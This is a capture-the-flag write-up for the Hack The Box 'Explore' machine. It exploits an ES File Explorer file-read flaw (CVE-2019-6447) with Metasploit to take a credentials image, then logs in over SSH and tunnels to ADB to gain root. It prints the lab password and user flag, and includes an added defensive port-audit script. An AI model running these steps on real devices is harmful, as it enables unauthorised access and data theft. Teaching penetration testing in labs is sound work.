HTB:Explore[WriteUP]
Connect to the HTB server and start the target machine
Target IP: 10.10.10.247
Assigned IP: 10.10.16.7
1.Which port is being used by the ES File Explorer application?
Run a full nmap scan against the target
nmap -p- -A 10.10.10.247
The scan shows port 42135 hosting the ES File Explorer application. I entered that and don't know why it was wrong; anyway, the correct answer is 59777.
2.What 2019 CVE ID is ES File Explorer vulnerable to?
Search for ES File Explorer directly with searchsploit
searchsploit ES File Explorer
Copy the exploit into the current directory
searchsploit -m 50070.py
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 50070.py
Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
URL: https://www.exploit-db.com/exploits/50070
Path: /usr/share/exploitdb/exploits/android/remote/50070.py
Codes: CVE-2019-6447
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/Desktop/temp/50070.py
Vulnerability ID: CVE-2019-6447
3.Give the complete path of the Metasploit module which can be used to exploit the above CVE.
Start Metasploit
msfconsole
Search directly for modules related to ES File Explorer
search ES File Explorer
Full module name: auxiliary/scanner/http/es_file_explorer_open_port
4.What is the password for user kristi on the box?
Switch to that module
use auxiliary/scanner/http/es_file_explorer_open_port
List all options the module accepts
show options
List all actions the module supports
show actions
Here, set the action to LISTPICS to list all pictures on the device
set action LISTPICS
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action LISTPICS
action => LISTPICS
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run
[+] 10.10.10.247:59777
concept.jpg (135.33 KB) - 4/21/21 02:38:08 AM: /storage/emulated/0/DCIM/concept.jpg
anc.png (6.24 KB) - 4/21/21 02:37:50 AM: /storage/emulated/0/DCIM/anc.png
creds.jpg (1.14 MB) - 4/21/21 02:38:18 AM: /storage/emulated/0/DCIM/creds.jpg
224_anc.png (124.88 KB) - 4/21/21 02:37:21 AM: /storage/emulated/0/DCIM/224_anc.png
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Try to retrieve the file /storage/emulated/0/DCIM/creds.jpg
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set action GETFILE
action => GETFILE
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > set ACTIONITEM /storage/emulated/0/DCIM/creds.jpg
ACTIONITEM => /storage/emulated/0/DCIM/creds.jpg
msf6 auxiliary(scanner/http/es_file_explorer_open_port) > run
[+] 10.10.10.247:59777 - /storage/emulated/0/DCIM/creds.jpg saved to /root/.msf4/loot/20241110084132_default_10.10.10.247_getFile_945793.jpg
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Account: kristi
Password: Kr1sT!5h@Rp3xPl0r3!
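5.Submit the flag located in /storage/emulated/0/.
Log in to the target over SSH with the credentials above (if the connection fails, check whether the password was mistyped, especially the letter case)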
sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@10.10.10.247 -o HostKeyAlgorithms=+ssh-rsa
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@10.10.10.247 -o HostKeyAlgorithms=+ssh-rsa
Password authentication
:/ $ whoami
u0_a76
Change into the /storage/emulated/0/ directory
cd /storage/emulated/0/
View the contents of user.txt
cat user.txt
:/ $ cd /storage/emulated/0/
:/storage/emulated/0 $ ls
Alarms DCIM Movies Notifications Podcasts backups user.txt
Android Download Music Pictures Ringtones dianxinos
:/storage/emulated/0 $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
USER_FLAG:f32017174c7c7e8f50c6da52891ae250
6.Which port is being filtered by the firewall?
Check the target's network connections
ss -tlnp
In the nmap port scan we ran against the target at the start, port 5555 was shown as filtered
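Why a filtered port still matters, as an added example (not part of the original write-up): the sketch below cross-checks `ss -tln` listeners against externally observed port states and flags services that the firewall hides from the network but that any local account can still reach. The sample `ss` output and the scan states other than 5555/filtered are constructed, and the function names are hypothetical.

```python
import re

# Constructed sample of `ss -tln` output (not captured from the target).
SAMPLE_SS = """\
State    Recv-Q   Send-Q   Local Address:Port          Peer Address:Port
LISTEN   0        50       *:2222                      *:*
LISTEN   0        8        [::ffff:127.0.0.1]:37525    *:*
LISTEN   0        4        *:5555                      *:*
LISTEN   0        10       *:42135                     *:*
LISTEN   0        50       *:59777                     *:*
"""

# Port states as an external scan would report them. Constructed, except
# 5555/filtered, which the write-up states.
SAMPLE_SCAN = {2222: "open", 5555: "filtered", 42135: "open", 59777: "open"}

LOOPBACK = re.compile(r"^(127\.|\[?::1\]?$|\[?::ffff:127\.)")

def parse_listeners(ss_text):
    """Return {port: bind_address} for every LISTEN row of `ss -tln` output."""
    listeners = {}
    for line in ss_text.splitlines():
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue  # header row or non-listening socket
        addr, _, port = fields[3].rpartition(":")
        if port.isdigit():
            listeners[int(port)] = addr
    return listeners

def audit(ss_text, scan_states):
    """Classify each listener by how it can be reached."""
    findings = {}
    for port, addr in sorted(parse_listeners(ss_text).items()):
        state = scan_states.get(port, "closed")
        if LOOPBACK.match(addr):
            findings[port] = "loopback-only"
        elif state == "open":
            findings[port] = "network-exposed"
        else:
            # The firewall hides it from the network, but a local shell or
            # a forwarded connection still reaches it.
            findings[port] = "firewalled-but-local"
    return findings

if __name__ == "__main__":
    for port, verdict in audit(SAMPLE_SS, SAMPLE_SCAN).items():
        print(port, verdict)
```

A service in the firewalled-but-local class needs its own authentication or should be disabled, because the packet filter is not a control against users who already have a session on the device.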
7.What is the standard Google-provided command line tool for interacting with Android debug?
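The standard Google-provided command-line tool for interacting with Android debugging is ADB (Android Debug Bridge). It lets developers operate on an Android device from a computer's command line, for example installing and uninstalling apps, retrieving device information, and transferring files between the device and the computer.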
8.Submit the flag located in /data/.
Forward the target's port 5555 to local port 6666 through the SSH service
sshpass -p 'Kr1sT!5h@Rp3xPl0r3!' ssh -p 2222 kristi@10.10.10.247 -o HostKeyAlgorithms=+ssh-rsa -N -L 6666:localhost:5555
Connect to the device with adb
adb connect 127.0.0.1:6666
List the connected devices
adb devices
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# adb devices
List of devices attached
127.0.0.1:6666 device
emulator-5554 device
Switch the connection to the device to root
adb -s 127.0.0.1:6666 root
Open a shell on the device
adb -s 127.0.0.1:6666 shell
Find root.txt and view its contents